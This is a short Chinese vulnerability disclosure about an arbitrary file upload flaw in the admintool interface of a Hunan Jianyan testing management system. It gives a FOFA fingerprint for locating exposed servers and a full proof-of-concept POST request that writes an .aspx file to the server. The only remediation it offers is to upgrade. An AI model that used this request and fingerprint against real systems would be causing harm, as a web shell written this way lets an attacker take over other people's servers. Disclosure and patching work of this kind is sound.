某检测系统(admintool)接口任意文件上传漏洞
【摘要】 本检测信息管理系统能够实现检验工作的计算机化和网络化管理,基本实现检测数据的自动采集 确保检验数据的公正性、科学性和准确性,确保检验报告的规范性和权威性,确保检验工作的高效率和服务的及时性, admintool 接口存在任意文件上传漏洞。
前言
湖南建研检测系统 admintool接口任意文件上传漏洞,攻击者可通过该漏洞获取服务器敏感信息。
一、漏洞详情
本检测信息管理系统能够实现检验工作的计算机化和网络化管理,基本实现检测数据的自动采集 确保检验数据的公正性、科学性和准确性,确保检验报告的规范性和权威性,确保检验工作的高效率和服务的及时性, admintool 接口存在任意文件上传漏洞。
二、影响版本
湖南建研-检测系统
三、漏洞复现
FOFA: body="/Content/Theme/Standard/webSite/login.css"
上传文件数据包
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: ip:host
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 41
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
filePath=log.aspx&fileContent=abc
访问上传路径
四、修复建议
升级至最新版本
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)